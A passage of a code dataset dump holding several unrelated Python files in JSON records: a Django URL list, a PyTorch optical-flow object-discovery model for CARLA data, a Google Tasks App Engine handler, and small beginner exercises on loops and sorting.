backend.is_shared),\n path('share' , backend.share),\n path('share_cancel' , backend.share_cancel),\n path('get_profile_page' , backend.get_profile_page),\n path('get_main_page' , backend.get_main_page),\n path('get_friend_page', backend.get_friend_page),\n path('get_shop_page', backend.get_shop_page),\n # \n # path('chat_update', backend.chat_update),\n\n \n\n\n]\n","sub_path":"main_project/main_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"274784914","text":"import torch\nimport torch.nn as nn\nimport hyperparams as hyp\nimport numpy as np\nimport time\n\nfrom model_base import Model\n# from nets.featnet import FeatNet\n# from nets.occnet import OccNet\n# from nets.flownet import FlowNet\n# from nets.viewnet import ViewNet\n# from nets.embnet2D import EmbNet2D\n# from nets.embnet3D import EmbNet3D\nfrom nets.pwcnet import PWCNet\n\nimport torch.nn.functional as F\n\nfrom utils_basic import *\nimport utils_vox\nimport utils_samp\nimport utils_geom\nimport utils_misc\nimport utils_improc\nimport utils_basic\nimport utils_eval\n\nfrom tensorboardX import SummaryWriter\nfrom backend import saverloader, inputs\nfrom torchvision import datasets, transforms\n\nnp.set_printoptions(precision=2)\nnp.random.seed(0)\nMAX_QUEUE = 10 # how many items before the summaryWriter flushes\n\nclass CARLA_PWC(Model):\n def initialize_model(self):\n print(\"------ INITIALIZING MODEL OBJECTS ------\")\n self.model = CarlaPWCNet().to(self.device)\n\n def go(self):\n self.start_time = time.time()\n self.initialize_model()\n print(\"------ Done creating models ------\")\n if hyp.lr > 0:\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=hyp.lr)\n self.start_iter = saverloader.load_weights(self.model, self.optimizer)\n print(\"------ Done loading weights ------\")\n else:\n self.start_iter = 0\n\n if hyp.do_save_outputs:\n out_dir = 'outs/%s' % (hyp.name)\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n set_nums = []\n set_names = []\n set_inputs = []\n set_writers = []\n set_log_freqs = []\n set_do_backprops = []\n set_dicts = []\n set_loaders = []\n\n for set_name in hyp.set_names:\n if hyp.sets_to_run[set_name]:\n set_nums.append(hyp.set_nums[set_name])\n set_names.append(set_name)\n set_inputs.append(self.all_inputs[set_name])\n set_writers.append(SummaryWriter(self.log_dir + '/' + set_name, max_queue=MAX_QUEUE, flush_secs=60))\n set_log_freqs.append(hyp.log_freqs[set_name])\n set_do_backprops.append(hyp.sets_to_backprop[set_name])\n set_dicts.append({})\n set_loaders.append(iter(set_inputs[-1]))\n\n if hyp.do_eval_map:\n all_maps_v0 = []\n all_maps_v1 = []\n all_maps_v2 = []\n all_maps_v3 = []\n all_maps_v4 = []\n all_maps_v5 = []\n \n actual_step = 0\n for step in list(range(self.start_iter+1, hyp.max_iters+1)):\n for i, (set_input) in enumerate(set_inputs):\n if step % len(set_input) == 0: #restart after one epoch. Note this does nothing for the tfrecord loader\n set_loaders[i] = iter(set_input)\n\n for (set_num,\n set_name,\n set_input,\n set_writer,\n set_log_freq,\n set_do_backprop,\n set_dict,\n set_loader\n ) in zip(\n set_nums,\n set_names,\n set_inputs,\n set_writers,\n set_log_freqs,\n set_do_backprops,\n set_dicts,\n set_loaders\n ): \n\n log_this = np.mod(step, set_log_freq)==0\n total_time, read_time, iter_time = 0.0, 0.0, 0.0\n\n if log_this or set_do_backprop or hyp.do_save_outputs:\n \n read_start_time = time.time()\n\n feed = next(set_loader)\n feed_cuda = {}\n for k in feed:\n try:\n feed_cuda[k] = feed[k].cuda(non_blocking=True)\n except:\n # some things are not tensors (e.g., filename)\n feed_cuda[k] = feed[k]\n\n # feed_cuda = next(iter(set_input))\n read_time = time.time() - read_start_time\n \n feed_cuda['writer'] = set_writer\n feed_cuda['global_step'] = step\n feed_cuda['set_num'] = set_num\n feed_cuda['set_name'] = set_name\n\n\n filename = feed_cuda['filename'][0]\n # print('filename = %s' % filename)\n tokens = filename.split('/')\n filename = tokens[-1]\n # print('new filename = %s' % filename)\n \n iter_start_time = time.time()\n if set_do_backprop:\n self.model.train()\n loss, results, returned_early = self.model(feed_cuda)\n else:\n self.model.eval()\n with torch.no_grad():\n loss, results, returned_early = self.model(feed_cuda)\n loss_vis = loss.cpu().item()\n\n # if hyp.do_save_outputs:\n # out_fn = '%s/%s_flow_memRs.npy' % (out_dir, filename)\n # flow_memRs = results['flow_memRs'][0]\n # flow_memRs = flow_memRs.detach().cpu()\n # np.save(out_fn, flow_memRs)\n # print('saved %s' % out_fn)\n # print(flow_memRs.shape)\n\n if hyp.do_eval_map and (not returned_early):\n maps_v0 = results['maps_v0']\n all_maps_v0.append(maps_v0)\n all_maps_v0_ = np.stack(all_maps_v0, axis=0)\n all_maps_v0_ = np.mean(all_maps_v0_, axis=0)\n print('all_maps_v0_:', all_maps_v0_)\n \n maps_v1 = results['maps_v1']\n all_maps_v1.append(maps_v1)\n all_maps_v1_ = np.stack(all_maps_v1, axis=0)\n all_maps_v1_ = np.mean(all_maps_v1_, axis=0)\n print('all_maps_v1_:', all_maps_v1_)\n \n maps_v2 = results['maps_v2']\n all_maps_v2.append(maps_v2)\n all_maps_v2_ = np.stack(all_maps_v2, axis=0)\n all_maps_v2_ = np.mean(all_maps_v2_, axis=0)\n print('all_maps_v2_:', all_maps_v2_)\n \n maps_v3 = results['maps_v3']\n all_maps_v3.append(maps_v3)\n all_maps_v3_ = np.stack(all_maps_v3, axis=0)\n all_maps_v3_ = np.mean(all_maps_v3_, axis=0)\n print('all_maps_v3_:', all_maps_v3_)\n \n maps_v4 = results['maps_v4']\n all_maps_v4.append(maps_v4)\n all_maps_v4_ = np.stack(all_maps_v4, axis=0)\n all_maps_v4_ = np.mean(all_maps_v4_, axis=0)\n print('all_maps_v4_:', all_maps_v4_)\n \n maps_v5 = results['maps_v5']\n all_maps_v5.append(maps_v5)\n all_maps_v5_ = np.stack(all_maps_v5, axis=0)\n all_maps_v5_ = np.mean(all_maps_v5_, axis=0)\n print('all_maps_v5_:', all_maps_v5_)\n \n if (not returned_early) and (set_do_backprop) and (hyp.lr > 0):\n loss.backward()\n self.optimizer.step()\n self.optimizer.zero_grad()\n iter_time = time.time()-iter_start_time\n total_time = time.time()-self.start_time\n\n print(\"%s; [%4d/%4d]; ttime: %.0f (%.2f, %.2f); loss: %.3f (%s)\" % (hyp.name,\n step,\n hyp.max_iters,\n total_time,\n read_time,\n iter_time,\n loss_vis,\n set_name))\n \n if np.mod(step, hyp.snap_freq) == 0 and hyp.lr > 0:\n saverloader.save(self.model, self.checkpoint_dir, step, self.optimizer)\n\n for writer in set_writers: #close writers to flush cache into file\n writer.close()\n \n\nclass CarlaPWCNet(nn.Module):\n def __init__(self):\n super(CarlaPWCNet, self).__init__()\n self.pwcnet = PWCNet()\n\n # torch.set_default_tensor_type('torch.cuda.FloatTensor')\n torch.autograd.set_detect_anomaly(True)\n \n self.include_image_summs = hyp.do_include_summs\n\n def forward(self, feed):\n results = dict()\n summ_writer = utils_improc.Summ_writer(writer=feed['writer'],\n global_step=feed['global_step'],\n set_name=feed['set_name'],\n fps=8)\n \n writer = feed['writer']\n global_step = feed['global_step']\n\n total_loss = torch.tensor(0.0).cuda()\n\n __p = lambda x: pack_seqdim(x, B)\n __u = lambda x: unpack_seqdim(x, B)\n\n B, H, W, V, S, N = hyp.B, hyp.H, hyp.W, hyp.V, hyp.S, hyp.N\n PH, PW = hyp.PH, hyp.PW\n K = hyp.K\n Z, Y, X = hyp.Z, hyp.Y, hyp.X\n Z2, Y2, X2 = int(Z/2), int(Y/2), int(X/2)\n D = 9\n\n rgb_camRs = feed[\"rgb_camRs\"]\n rgb_camXs = feed[\"rgb_camXs\"]\n pix_T_cams = feed[\"pix_T_cams\"]\n cam_T_velos = feed[\"cam_T_velos\"]\n \n if (not hyp.flow_do_synth_rt) or feed['set_name']=='val':\n boxlist_camRs = feed[\"boxes3D\"]\n tidlist_s = feed[\"tids\"] # coordinate-less and plural\n scorelist_s = feed[\"scores\"] # coordinate-less and plural\n # # postproc the boxes:\n # scorelist_s = __u(utils_misc.rescore_boxlist_with_inbound(__p(boxlist_camRs), __p(tidlist_s), Z, Y, X))\n\n boxlist_camRs_, tidlist_s_, scorelist_s_ = __p(boxlist_camRs), __p(tidlist_s), __p(scorelist_s)\n boxlist_camRs_, tidlist_s_, scorelist_s_ = utils_misc.shuffle_valid_and_sink_invalid_boxes(\n boxlist_camRs_, tidlist_s_, scorelist_s_)\n boxlist_camRs = __u(boxlist_camRs_)\n tidlist_s = __u(tidlist_s_)\n scorelist_s = __u(scorelist_s_)\n\n origin_T_camRs = feed[\"origin_T_camRs\"]\n origin_T_camRs_ = __p(origin_T_camRs)\n origin_T_camXs = feed[\"origin_T_camXs\"]\n origin_T_camXs_ = __p(origin_T_camXs)\n\n camX0_T_camXs = utils_geom.get_camM_T_camXs(origin_T_camXs, ind=0)\n camX0_T_camXs_ = __p(camX0_T_camXs)\n camRs_T_camXs_ = torch.matmul(origin_T_camRs_.inverse(), origin_T_camXs_)\n camXs_T_camRs_ = camRs_T_camXs_.inverse()\n camRs_T_camXs = __u(camRs_T_camXs_)\n camXs_T_camRs = __u(camXs_T_camRs_)\n\n xyz_veloXs = feed[\"xyz_veloXs\"]\n xyz_camXs = __u(utils_geom.apply_4x4(__p(cam_T_velos), __p(xyz_veloXs)))\n xyz_camRs = __u(utils_geom.apply_4x4(__p(camRs_T_camXs), __p(xyz_camXs)))\n xyz_camX0s = __u(utils_geom.apply_4x4(__p(camX0_T_camXs), __p(xyz_camXs)))\n\n # occXs = __u(utils_vox.voxelize_xyz(__p(xyz_camXs), Z, Y, X))\n occX0s = __u(utils_vox.voxelize_xyz(__p(xyz_camX0s), Z, Y, X))\n # occXs_half = __u(utils_vox.voxelize_xyz(__p(xyz_camXs), Z2, Y2, X2))\n occX0s_half = __u(utils_vox.voxelize_xyz(__p(xyz_camX0s), Z2, Y2, X2))\n\n unpXs = __u(utils_vox.unproject_rgb_to_mem(\n __p(rgb_camXs), Z, Y, X, __p(pix_T_cams)))\n unpX0s = utils_vox.apply_4x4s_to_voxs(camX0_T_camXs, unpXs)\n unpXs_half = __u(utils_vox.unproject_rgb_to_mem(\n __p(rgb_camXs), Z2, Y2, X2, __p(pix_T_cams)))\n unpX0s_half = utils_vox.apply_4x4s_to_voxs(camX0_T_camXs, unpXs_half)\n\n ## projected depth, and inbound mask\n depth_camXs_, valid_camXs_ = utils_geom.create_depth_image(__p(pix_T_cams), __p(xyz_camXs), H, W)\n dense_xyz_camXs_ = utils_geom.depth2pointcloud(depth_camXs_, __p(pix_T_cams))\n dense_xyz_camRs_ = utils_geom.apply_4x4(__p(camRs_T_camXs), dense_xyz_camXs_)\n inbound_camXs_ = utils_vox.get_inbounds(dense_xyz_camRs_, Z, Y, X).float()\n inbound_camXs_ = torch.reshape(inbound_camXs_, [B*S, 1, H, W])\n inbound_camXs = __u(inbound_camXs_)\n depth_camXs = __u(depth_camXs_)\n valid_camXs = __u(valid_camXs_) * __u(inbound_camXs_)\n\n\n\n depth_camX0s_, valid_camX0s_ = utils_geom.create_depth_image(__p(pix_T_cams), __p(xyz_camX0s), H, W)\n depth_camX0s = __u(depth_camX0s_)\n \n\n #####################\n ## visualize what we got\n #####################\n summ_writer.summ_oneds('2D_inputs/depth_camXs', torch.unbind(depth_camXs, dim=1))\n summ_writer.summ_oneds('2D_inputs/valid_camXs', torch.unbind(valid_camXs, dim=1))\n summ_writer.summ_rgbs('2D_inputs/rgb_camRs', torch.unbind(rgb_camRs, dim=1))\n summ_writer.summ_rgbs('2D_inputs/rgb_camXs', torch.unbind(rgb_camXs, dim=1))\n # summ_writer.summ_occs('3D_inputs/occXs', torch.unbind(occXs, dim=1))\n summ_writer.summ_occs('3D_inputs/occX0s', torch.unbind(occX0s, dim=1))\n # summ_writer.summ_unps('3D_inputs/unpXs', torch.unbind(unpXs, dim=1), torch.unbind(occXs, dim=1))\n summ_writer.summ_unps('3D_inputs/unpX0s', torch.unbind(unpX0s, dim=1), torch.unbind(occX0s, dim=1))\n\n\n if (not hyp.flow_do_synth_rt) or feed['set_name']=='val':\n lrtlist_camRs = __u(utils_geom.convert_boxlist_to_lrtlist(boxlist_camRs_)).reshape(B, S, N, 19)\n lrtlist_camXs = __u(utils_geom.apply_4x4_to_lrtlist(__p(camXs_T_camRs), __p(lrtlist_camRs)))\n # stabilize boxes for ego/cam motion\n lrtlist_camX0s = __u(utils_geom.apply_4x4_to_lrtlist(__p(camX0_T_camXs), __p(lrtlist_camXs)))\n # these are is B x S x N x 19\n\n summ_writer.summ_lrtlist('lrtlist_camR0', rgb_camRs[:,0], lrtlist_camRs[:,0],\n scorelist_s[:,0], tidlist_s[:,0], pix_T_cams[:,0])\n summ_writer.summ_lrtlist('lrtlist_camR1', rgb_camRs[:,1], lrtlist_camRs[:,1],\n scorelist_s[:,1], tidlist_s[:,1], pix_T_cams[:,1])\n summ_writer.summ_lrtlist('lrtlist_camX0', rgb_camXs[:,0], lrtlist_camXs[:,0],\n scorelist_s[:,0], tidlist_s[:,0], pix_T_cams[:,0])\n summ_writer.summ_lrtlist('lrtlist_camX1', rgb_camXs[:,1], lrtlist_camXs[:,1],\n scorelist_s[:,1], tidlist_s[:,1], pix_T_cams[:,1])\n (obj_lrtlist_camXs,\n obj_scorelist_s,\n ) = utils_misc.collect_object_info(lrtlist_camXs,\n tidlist_s,\n scorelist_s,\n pix_T_cams, \n K, mod='X',\n do_vis=True,\n summ_writer=summ_writer)\n (obj_lrtlist_camRs,\n obj_scorelist_s,\n ) = utils_misc.collect_object_info(lrtlist_camRs,\n tidlist_s,\n scorelist_s,\n pix_T_cams, \n K, mod='R',\n do_vis=True,\n summ_writer=summ_writer)\n (obj_lrtlist_camX0s,\n obj_scorelist_s,\n ) = utils_misc.collect_object_info(lrtlist_camX0s,\n tidlist_s,\n scorelist_s,\n pix_T_cams, \n K, mod='X0',\n do_vis=False)\n\n masklist_memR = utils_vox.assemble_padded_obj_masklist(\n lrtlist_camRs[:,0], scorelist_s[:,0], Z, Y, X, coeff=1.0)\n masklist_memX = utils_vox.assemble_padded_obj_masklist(\n lrtlist_camXs[:,0], scorelist_s[:,0], Z, Y, X, coeff=1.0)\n # obj_mask_memR is B x N x 1 x Z x Y x X\n summ_writer.summ_occ('obj/masklist_memR', torch.sum(masklist_memR, dim=1))\n summ_writer.summ_occ('obj/masklist_memX', torch.sum(masklist_memX, dim=1))\n\n # flow_pwc = self.pwcnet(rgb_camRs[:, 0] + 0.5, rgb_camRs[:, 1] + 0.5) # only 1/255 normalization in pwcnet \n # summ_writer.summ_flow('flow/flow_pwc', flow_pwc)\n\n # compute flow from X0 to X1\n # (to be fair with our own models, we use inputs in X coordinates)\n pwcflow_camX0 = self.pwcnet(rgb_camXs[:, 0] + 0.5, rgb_camXs[:, 1] + 0.5) # only 1/255 normalization in pwcnet \n summ_writer.summ_flow('flow/pwcflow_camX0', pwcflow_camX0)\n\n \n camX0_T_camX1 = camX0_T_camXs[:,1]\n camX1_T_camX0 = utils_geom.safe_inverse(camX0_T_camX1)\n depth_camX0 = depth_camXs[:,0]\n egoflow_camX0 = utils_geom.depthrt2flow(depth_camX0, camX1_T_camX0, pix_T_cams[:,0])\n summ_writer.summ_flow('flow/egoflow_camX0', egoflow_camX0)\n rgb_camX1_egostab = utils_samp.backwarp_using_2D_flow(rgb_camXs[:,1], egoflow_camX0)\n valid_camX1_egostab = utils_samp.backwarp_using_2D_flow(torch.ones_like(rgb_camXs[:,1,0:1]), egoflow_camX0)\n valid_camX1_flowstab = utils_samp.backwarp_using_2D_flow(torch.ones_like(rgb_camXs[:,1,0:1]), pwcflow_camX0)\n egostab_rgbX0 = rgb_camXs[:,0]*valid_camX1_egostab\n egostab_rgbX1 = rgb_camX1_egostab*valid_camX1_egostab\n summ_writer.summ_rgbs('flow/rgb_stab', [egostab_rgbX0, egostab_rgbX1])\n\n # compute stabflow from X0 to X1\n stabpwcflow_camX0 = self.pwcnet(egostab_rgbX0 + 0.5, egostab_rgbX1 + 0.5) # only 1/255 normalization in pwcnet \n summ_writer.summ_flow('flow/stabpwcflow_camX0', stabpwcflow_camX0*inbound_camXs[:,0])\n\n # prep occR0, which we will use to mask the 3D flows\n occR0 = utils_vox.voxelize_xyz(xyz_camRs[:,0], Z2, Y2, X2)\n \n # v0: 2D flow estimated from real frames, minus egoflow, unprojected\n v0flow_camX0 = pwcflow_camX0 - egoflow_camX0\n summ_writer.summ_flow('flow/v0flow_camX0', v0flow_camX0*inbound_camXs[:,0])\n v0flow_memX0 = utils_vox.unproject_rgb_to_mem(\n v0flow_camX0, Z2, Y2, X2, pix_T_cams[:,0])\n v0flow_memR0 = utils_vox.apply_4x4_to_vox(camRs_T_camXs[:,0], v0flow_memX0)\n v0flow_memR0 = torch.cat([v0flow_memR0, torch.ones_like(v0flow_memR0[:,0:1])], dim=1)\n v0flow_memR0 = v0flow_memR0 * occR0\n summ_writer.summ_3D_flow('flow/v0flow_memR0', v0flow_memR0, clip=0.0)\n\n # v1: 2D flow estimated from ego-stabilized frames, unprojected\n v1flow_memX0 = utils_vox.unproject_rgb_to_mem(\n stabpwcflow_camX0, Z2, Y2, X2, pix_T_cams[:,0])\n v1flow_memR0 = utils_vox.apply_4x4_to_vox(camRs_T_camXs[:,0], v1flow_memX0)\n v1flow_memR0 = torch.cat([v1flow_memR0, torch.ones_like(v1flow_memR0[:,0:1])], dim=1)\n v1flow_memR0 = v1flow_memR0 * occR0\n summ_writer.summ_3D_flow('flow/v1flow_memR0', v1flow_memR0, clip=0.0)\n\n # v2: 3D flow estimated by backwarping depth1, unprojected\n depth_camX1_flowstab = utils_samp.backwarp_using_2D_flow(depth_camXs[:,1], pwcflow_camX0)\n xyz0 = utils_geom.depth2pointcloud(depth_camXs[:,0], pix_T_cams[:,0])\n xyz1 = utils_geom.depth2pointcloud(depth_camX1_flowstab, pix_T_cams[:,0])\n v2flow_camX0 = xyz1-xyz0\n v2flow_camX0 = v2flow_camX0.reshape([B, H, W, 3]).permute(0, 3, 1, 2)*valid_camX1_flowstab\n summ_writer.summ_flow('flow/v2flow_camX0', v2flow_camX0[:,:2]*inbound_camXs[:,0])\n v2flow_memX0 = utils_vox.unproject_rgb_to_mem(\n v2flow_camX0, Z2, Y2, X2, pix_T_cams[:,0])\n v2flow_memR0 = utils_vox.apply_4x4_to_vox(camRs_T_camXs[:,0], v2flow_memX0)\n v2flow_memR0 = v2flow_memR0 * occR0\n summ_writer.summ_3D_flow('flow/v2flow_memR0', v2flow_memR0, clip=0.0)\n\n # v3: 3D flow estimated by backwarping the ego-stabilized pointcloud\n depth_camX1_egostab = utils_samp.backwarp_using_2D_flow(depth_camXs[:,1], egoflow_camX0)\n depth_camX1_egostab_and_flowstab = utils_samp.backwarp_using_2D_flow(depth_camX1_egostab, stabpwcflow_camX0)\n xyz0 = utils_geom.depth2pointcloud(depth_camXs[:,0], pix_T_cams[:,0])\n xyz1 = utils_geom.depth2pointcloud(depth_camX1_egostab_and_flowstab, pix_T_cams[:,0])\n v3flow_camX0 = xyz1-xyz0\n v3flow_camX0 = v3flow_camX0.reshape([B, H, W, 3]).permute(0, 3, 1, 2)*valid_camX1_egostab\n summ_writer.summ_flow('flow/v3flow_camX0_2chan', v3flow_camX0[:,:2]*inbound_camXs[:,0])\n v3flow_memX0 = utils_vox.unproject_rgb_to_mem(\n v3flow_camX0, Z2, Y2, X2, pix_T_cams[:,0])\n v3flow_memR0 = utils_vox.apply_4x4_to_vox(camRs_T_camXs[:,0], v3flow_memX0)\n v3flow_memR0 = v3flow_memR0 * occR0\n summ_writer.summ_3D_flow('flow/v3flow_memR0', v3flow_memR0, clip=0.0)\n\n\n # v4: 2D flow estimated from real frames, unprojected\n v4flow_camX0 = pwcflow_camX0\n summ_writer.summ_flow('flow/v4flow_camX0', v4flow_camX0*inbound_camXs[:,0])\n v4flow_memX0 = utils_vox.unproject_rgb_to_mem(\n v4flow_camX0, Z2, Y2, X2, pix_T_cams[:,0])\n v4flow_memR0 = utils_vox.apply_4x4_to_vox(camRs_T_camXs[:,0], v4flow_memX0)\n v4flow_memR0 = torch.cat([v4flow_memR0, torch.ones_like(v4flow_memR0[:,0:1])], dim=1)\n v4flow_memR0 = v4flow_memR0 * occR0\n summ_writer.summ_3D_flow('flow/v4flow_memR0', v4flow_memR0, clip=0.0)\n\n\n # v5: 3D flow estimated by backwarping the geometrically-stabilized pointcloud\n depth_camX1_egostab_and_flowstab = utils_samp.backwarp_using_2D_flow(depth_camX0s[:,1], stabpwcflow_camX0)\n xyz0 = utils_geom.depth2pointcloud(depth_camXs[:,0], pix_T_cams[:,0])\n xyz1 = utils_geom.depth2pointcloud(depth_camX1_egostab_and_flowstab, pix_T_cams[:,0])\n v5flow_camX0 = xyz1-xyz0\n v5flow_camX0 = v5flow_camX0.reshape([B, H, W, 3]).permute(0, 3, 1, 2)*valid_camX1_egostab\n summ_writer.summ_flow('flow/v5flow_camX0_2chan', v5flow_camX0[:,:2]*inbound_camXs[:,0])\n v5flow_memX0 = utils_vox.unproject_rgb_to_mem(\n v5flow_camX0, Z2, Y2, X2, pix_T_cams[:,0])\n v5flow_memR0 = utils_vox.apply_4x4_to_vox(camRs_T_camXs[:,0], v5flow_memX0)\n v5flow_memR0 = v5flow_memR0 * occR0\n summ_writer.summ_3D_flow('flow/v5flow_memR0', v5flow_memR0, clip=0.0)\n \n\n if hyp.do_eval_map:\n maps_v0 = self.discover(v0flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n maps_v1 = self.discover(v1flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n maps_v2 = self.discover(v2flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n maps_v3 = self.discover(v3flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n maps_v4 = self.discover(v4flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n maps_v5 = self.discover(v5flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n results['maps_v0'] = maps_v0\n results['maps_v1'] = maps_v1\n results['maps_v2'] = maps_v2\n results['maps_v3'] = maps_v3\n results['maps_v4'] = maps_v4\n results['maps_v5'] = maps_v5\n else:\n maps_v0 = self.discover(v0flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n \n return total_loss, results, False\n\n \n def discover(self, flow, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer):\n flow_mag = torch.norm(flow, dim=1)\n # this is B x Z2 x Y2 x X2\n occ_flow_mag = flow_mag * occR0[:,0]\n\n # get K boxes\n det_image, boxlist_memR, scorelist, tidlist, connlist = utils_misc.get_boxes_from_flow_mag(occ_flow_mag, K)\n # boxlist_memR is B x K x 9\n boxlist_camR = utils_vox.convert_boxlist_memR_to_camR(boxlist_memR, Z2, Y2, X2)\n lrtlist_camR = utils_geom.convert_boxlist_to_lrtlist(boxlist_camR)\n\n masklist_1 = utils_vox.assemble_padded_obj_masklist(\n lrtlist_camR, scorelist, Z2, Y2, X2, coeff=0.8)\n masklist_2 = utils_vox.assemble_padded_obj_masklist(\n lrtlist_camR, scorelist, Z2, Y2, X2, coeff=1.2)\n masklist_3 = utils_vox.assemble_padded_obj_masklist(\n lrtlist_camR, scorelist, Z2, Y2, X2, coeff=1.8)\n # these are B x K x 1 x Z2 x Y2 x X2\n\n # use_center_surround = False\n use_center_surround = True\n\n if use_center_surround:\n # the idea of a center-surround feature is:\n # there should be stuff in the center but not in the surround\n # so, i need the density of the center\n # and the density of the surround\n # then, the score is center minus surround\n center_mask = (masklist_1).squeeze(2)\n surround_mask = (masklist_3-masklist_2).squeeze(2)\n # these are B x K x Z x Y x X\n\n # it could be that this scoring would work better with estimated occs,\n # since they are thicker\n\n weights = torch.ones(1, 1, 3, 3, 3, device=torch.device('cuda'))\n occ = F.conv3d(occR0, weights, padding=1)\n occ = torch.clamp(occ, 0, 1)\n occ = occ.squeeze(1)\n\n if self.include_image_summs:\n summ_writer.summ_3D_flow('flow/occ_flow', occ.unsqueeze(1)*flow)\n summ_writer.summ_rgb('obj/det_image', det_image)\n summ_writer.summ_lrtlist('obj/det_boxlist', rgb_camRs[:,0], lrtlist_camR,\n scorelist, tidlist, pix_T_cams[:,0])\n \n occ_flow_mag = flow_mag * occ\n occ_flow_mag_ = occ_flow_mag.unsqueeze(1).repeat(1, K, 1, 1, 1)\n center_ = utils_basic.reduce_masked_mean(occ_flow_mag_, center_mask, dim=[2,3,4])\n surround_ = utils_basic.reduce_masked_mean(occ_flow_mag_, surround_mask, dim=[2,3,4])\n\n scorelist = center_ - surround_\n # scorelist is B x K, with arbitrary range\n scorelist = torch.clamp(torch.sigmoid(scorelist), min=1e-4)\n # scorelist is B x K, in the range [0,1]\n\n if self.include_image_summs:\n summ_writer.summ_lrtlist('obj/scored_boxlist', rgb_camRs[:,0], lrtlist_camR,\n scorelist, tidlist, pix_T_cams[:,0])\n lrtlist_camX = utils_geom.apply_4x4_to_lrtlist(camXs_T_camRs[:,0], lrtlist_camR)\n summ_writer.summ_lrtlist('obj/scored_boxlistX', rgb_camXs[:,0], lrtlist_camX,\n scorelist, tidlist, pix_T_cams[:,0])\n\n boxlist_e = boxlist_camR.detach().cpu().numpy()\n boxlist_g = boxlist_camRs[:,0].detach().cpu().numpy()\n scorelist_e = scorelist.detach().cpu().numpy()\n scorelist_g = scorelist_s[:,0].detach().cpu().numpy()\n\n assert(B==1)\n boxlist_e, boxlist_g, scorelist_e, _ = utils_eval.drop_invalid_boxes(\n boxlist_e, boxlist_g, scorelist_e, scorelist_g)\n\n ious = np.linspace(0.1, 0.9, 9)\n maps = utils_eval.get_mAP(boxlist_e, scorelist_e, boxlist_g, ious)\n return maps\n\n","sub_path":"pytorch_disco_recovery/model_carla_pwc.py","file_name":"model_carla_pwc.py","file_ext":"py","file_size_in_byte":28745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"56135254","text":"import os\nimport logging\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\n\nfrom apiclient.discovery import build\nimport httplib2\nfrom oauth2client.appengine import OAuth2Decorator\nimport settings\nfrom django.utils import simplejson\n\ndecorator = OAuth2Decorator(client_id=settings.CLIENT_ID,\n client_secret=settings.CLIENT_SECRET,\n scope=settings.SCOPE,\n user_agent='karya')\n\nclass Task(object):\n def __init__(self, task_dict):\n self.name = task_dict['title']\n self.is_done = True if task_dict['status'] == 'completed' else False\n \n def __dict__(self):\n return {'name':self.name, 'isDone': self.is_done}\n \nclass MainHandler(webapp.RequestHandler):\n\n @decorator.oauth_required\n def get(self):\n if decorator.has_credentials():\n service = build('tasks', 'v1', http=decorator.http())\n result = service.tasks().list(tasklist='@default').execute()\n tasks = result.get('items',[])\n logging.info(tasks)\n path = os.path.join(os.path.dirname(__file__), 'templates/index.html')\n self.response.out.write(template.render(path, {'tasks':tasks}))\n else:\n url = decorator.authorize_url()\n logging.info(url)\n path = os.path.join(os.path.dirname(__file__), 'templates/index.html')\n self.response.out.write(template.render(path, {'url': url}))\n \nclass TasksHandler(webapp.RequestHandler):\n \n @decorator.oauth_required\n def get(self):\n if decorator.has_credentials():\n service = build('tasks', 'v1', http=decorator.http())\n result = service.tasks().list(tasklist='@default').execute()\n tasks = result.get('items',[])\n tasks = [Task(t) for t in tasks]\n self.response.out.write(simplejson.dumps([t.__dict__() for t in tasks]))\n \n","sub_path":"main_handler.py","file_name":"main_handler.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"138611205","text":"\"\"\"an example of a while loop statement.\"\"\"\n\ncounter: int = 0\n\"\"\"prepare a variable, and make it zero so it can count up\"\"\"\nmaximum: int = int(input(\"Count up to, but not including what?\"))\n\nwhile counter < 10:\n counter_squared: int = counter ** 2\n print(\"The square of \" + str(counter) + \" is \" + str(counter_squared))\n counter = counter + 1\n\"\"\"while counter is less than ten, print the number but then add one. then if that number is less than 10 again, add another until it is not less than 10. \"\"\"\n\n\nprint(\"Done!\")","sub_path":"lessons/while-loop.py","file_name":"while-loop.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"582143467","text":"def selectionSort(arr):\n for i in range(0, len(arr)-1):\n for j in range(i+1, len(arr)):\n if (arr[i] > arr[j]):\n tmp = arr[i]\n arr[i] = arr[j]\n arr[j] = tmp\n\narr = [2,8,3,9,8,7,3,7]\nselectionSort(arr)\nprint(arr)\n","sub_path":"Exercise/Array/Ex7.py","file_name":"Ex7.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"113784828","text":"\"\"\"testCreateIDService.py: All the unit test for create_id_service functions.\"\"\"\n__author__ = \"Girard 